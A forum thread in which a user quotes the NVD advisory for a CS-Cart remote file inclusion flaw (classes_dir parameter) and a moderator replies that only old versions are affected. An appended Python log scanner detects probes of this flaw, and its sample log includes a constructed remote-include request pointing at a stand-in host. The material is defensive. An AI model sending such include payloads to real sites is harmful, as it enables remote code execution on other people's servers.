cscart-classesdir-file-include

 
  • fwhorch
  • Junior Member
  • Members
  • Join Date: 07-Nov 07
  • 20 posts

Posted 18 November 2007 - 05:10 AM #1

Has this known security hole in cs-cart been fixed?

See http://nvd.nist.gov/...e=CVE-2006-2863

National Cyber-Alert System
Vulnerability Summary CVE-2006-2863
Original release date: 6/6/2006
Last revised: 10/30/2006
Source: US-CERT/NIST

Overview

PHP remote file inclusion vulnerability in class.cs_phpmailer.php in CS-Cart 1.3.3 allows remote attackers to execute arbitrary PHP code via a URL in the classes_dir parameter.

Impact

CVSS Severity (version 2.0 upgrade from v1.0):
CVSS v2 Base score: 5.1 (Medium) (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Impact Subscore: 6.4
Exploitability Subscore: 4.9

Access Vector: Network exploitable
Access Complexity: High
Authentication: Not required to exploit
Impact Type: Provides unauthorized access, Allows partial confidentiality, integrity, and availability violation, Allows unauthorized disclosure of information, Allows disruption of service

Solution

Successful exploitation requires that "register_globals" is enabled.

References to Advisories, Solutions, and Tools

External Source: BID

Name: 18263

Hyperlink: http://www.securityfocus.com/bid/18263

External Source: FRSIRT

Name: ADV-2006-2125

Type: Advisory
Hyperlink: http://www.frsirt.co...ories/2006/2125

External Source: MLIST

Name: [VIM] 20060606 CS-Cart: request for information (fwd)

Hyperlink: http://www.attrition...une/000824.html

External Source: SECUNIA

Name: 20440

Type: Advisory
Hyperlink: http://secunia.com/advisories/20440

External Source: Milw0rm

Name: exploit 1872

Hyperlink: http://milw0rm.com/exploits/1872

External Source: XF

Name: cscart-classesdir-file-include(26911)

Hyperlink: http://xforce.iss.ne...orce/xfdb/26911


Vulnerable software and versions

Configuration 1
− CS-Cart, CS-Cart, 1.3.3, and previous
− CS-Cart, CS-Cart, 1.3.0

 
  • snorocket
  • Forum Janitor
  • Members
  • Join Date: 15-Mar 06
  • 2519 posts

Posted 19 November 2007 - 04:22 PM #2

Has this known security hole in cs-cart been fixed?

Yes, it only affected versions:
CS-Cart, CS-Cart, 1.3.3, and previous
CS-Cart, CS-Cart, 1.3.0
SNOROCKET.COM, Now Accepting PRE-ORDERS:
Customer Service (Helpdesk) Addon for CS-Cart v4.3.1
Quote and Invoicing Addon for CS-Cart v4.3.1
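
For anyone still running an affected version, the advisory quoted in the first post gives enough to search web server logs for probes: the script name (class.cs_phpmailer.php) and the request parameter (classes_dir). The following is an added example, not part of the thread or of CS-Cart; it assumes combined-format access logs, and the sample log lines, addresses, host name and /store/lib/ directory are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script and parameter names are from the advisory; all else is assumed.
TARGET_SCRIPT = "class.cs_phpmailer.php"
TARGET_PARAM = "classes_dir"
# A value starting with scheme:// (http, ftp, php, ...), data: or // is a
# URL, not the local directory the variable is meant to hold.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]+://|data:|//)", re.I)
# Client address, request line and status of a combined-format log entry.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<target>\S+)'
    r' HTTP/[\d.]+" (?P<status>\d{3}) ')

# Constructed sample log: addresses, host and /store/lib/ are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [18/Nov/2007:05:10:01 +0000] "GET /index.php?target=products HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [18/Nov/2007:05:11:09 +0000] "GET /store/lib/class.cs_phpmailer.php?classes_dir=http%3A%2F%2Ffiles.example.invalid%2F HTTP/1.0" 200 311 "-" "-"
192.0.2.44 - - [18/Nov/2007:05:11:12 +0000] "GET /store/lib/class.cs_phpmailer.php?classes_dir=../ HTTP/1.0" 200 311 "-" "-"
198.51.100.7 - - [18/Nov/2007:05:12:30 +0000] "POST /store/lib/class.cs_phpmailer.php HTTP/1.1" 403 199 "-" "-"
"""

def classify(line):
    """Return (ip, status, verdict) for requests to the script, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if unquote(url.path).rsplit("/", 1)[-1].lower() != TARGET_SCRIPT:
        return None
    # parse_qsl percent-decodes once, as PHP does before register_globals
    # turns the parameter into a variable.
    values = [v for k, v in parse_qsl(url.query, keep_blank_values=True)
              if k == TARGET_PARAM]
    if any(REMOTE_VALUE.match(v) for v in values):
        verdict = "remote-include-attempt"
    elif values:
        verdict = "parameter-supplied"
    else:
        verdict = "direct-access"
    return m["ip"], int(m["status"]), verdict

def scan(log_text):
    """Classify every line of a log and keep only the hits."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for ip, status, verdict in scan(SAMPLE_LOG):
        print(f"{ip} status={status} {verdict}")
```

With register_globals enabled PHP also fills variables from POST bodies and cookies, which an access log does not record, so "direct-access" hits on the class file are worth reviewing as well.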